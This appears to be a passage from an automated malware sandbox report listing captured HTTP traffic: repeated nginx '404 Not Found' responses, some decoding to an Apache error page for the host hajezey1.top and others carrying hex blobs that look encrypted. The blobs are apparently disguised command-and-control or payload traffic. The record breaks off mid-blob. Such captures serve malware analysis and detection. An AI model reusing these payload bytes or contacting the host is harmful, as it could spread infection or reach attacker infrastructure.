                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:06:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c2 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOj{CUg%EQAc}yc0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:06:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:06:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 93 d6 10 49 3a 40 a8 e8 dd e1 fd 5f f7 4d 91 71 b2 42 4a 84 4b f4 f1 2c 89 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:@_MqBJK,0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:06:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:06:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:06:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c d8 21 bd 40 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 23 9f 87 cd 2b 80 78 51 a1 a2 8f 3c 08 d8 1c e0 32 02 50 08 08 d0 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 81 8a 20 59 55 11 5c b8 e6 6e ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 81 ff cc 8a 40 d8 06 0e 45 87 1b 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 30 4d 6b 0e e1 a2 22 48 12 da 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 e2 5f 96 da 19 d1 3a 2d 6e 44 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 2d 77 14 2c d0 e8 b1 14 b9 76 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 e2 49 64 cd 25 5c 8d b7 73 24 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 07 b2 be 34 56 9b 46 76 99 86 11 00 83 32 42 62 6f c9 ae 88 3b 95 36 e1 48 50 67 79 50 b8 81 be e6 81 de e3 75 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:06:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:06:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:06:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 81 71 e5 77 8f 8c f5 cf 9b 2b 25 9b f6 ba c9 1b b0 1c 67 74 d2 a5 98 87 cd 2b 80 78 51 a1 a2 8f bc 82 df 1c e0 32 02 50 08 88 d8 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 01 82 20 59 55 11 5c 2c 34 67 ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 01 75 cb 8a 40 d8 06 0e 45 07 13 7d 7b f9 e0 04 89 f9 d4 57 80 90 70 89 ec be 4a 6b 0e e1 a2 22 48 92 d2 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 53 68 58 96 da 19 d1 3a 2d e8 43 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 65 85 4a 04 38 ad 7f 14 2c d0 e8 b1 14 23 71 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 62 41 64 cd 25 5c 8d b7 f5 23 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 75 8d b5 be 34 56 9b 46 76 99 86 11 00 83 32 42 92 51 ce ae b8 6b 95 36 e1 48 52 67 76 50 b8 81 f6 bc 81 de bb 6e 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:06:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:06:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b c3 a7 86 38 b4 f2 a7 7c 2d f0 3a cb 8f 8c f5 cf 9b 2b 25 9b 16 ba eb 1b bb 1d 57 74 d2 eb 98 87 cd 23 80 78 51 a1 a2 8f d2 ee df 1c e0 12 02 50 08 08 d8 e2 30 a5 19 93 9b 97 4f f3 e0 e4 62 79 00 54 ea d6 d7 0c 3d 61 19 27 f4 d2 af 34 91 b4 b9 c1 82 20 59 57 11 5c 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f fc b7 a8 9f 96 98 8b 36 19 19 cb 8a f3 d8 05 0f 4e 86 19 7d 6f ab e1 04 89 63 7a 55 80 90 70 89 7f c8 4a 6b b6 e2 a2 22 48 42 d3 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 9b 84 c8 c3 e7 b2 ec 1c e1 0c 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 ec ef f7 0a 83 8b 71 91 e0 75 7e 64 19 a0 77 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa 6b 8a b2 e2 4b 6d ec 00 31 a5 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 fa 82 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 00 9d 82 ef d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 36 dd 3f 9d 43 cd 17 fe 2f 15 9f f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 68 aa cf 04 2a 95 36 56 0f 50 67 74 20 b9 87 f6 f4 81 de bb 34 6b 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 1f 3a 48 93 92 4e bd 44 ef fb c9 e3 de ea 50 38 02 97 b1 a4 57 25 57 b9 d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 00 fc ce 6e 47 b3 9a 4c 07 22 7d e6 a2 c6 62 b9 14 31 eb cd 40 24 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 04 dd be c6 83 41 5f 4f af b8 e8 01 be a2 57 ee 60 87 bd b7 6b 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 de 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 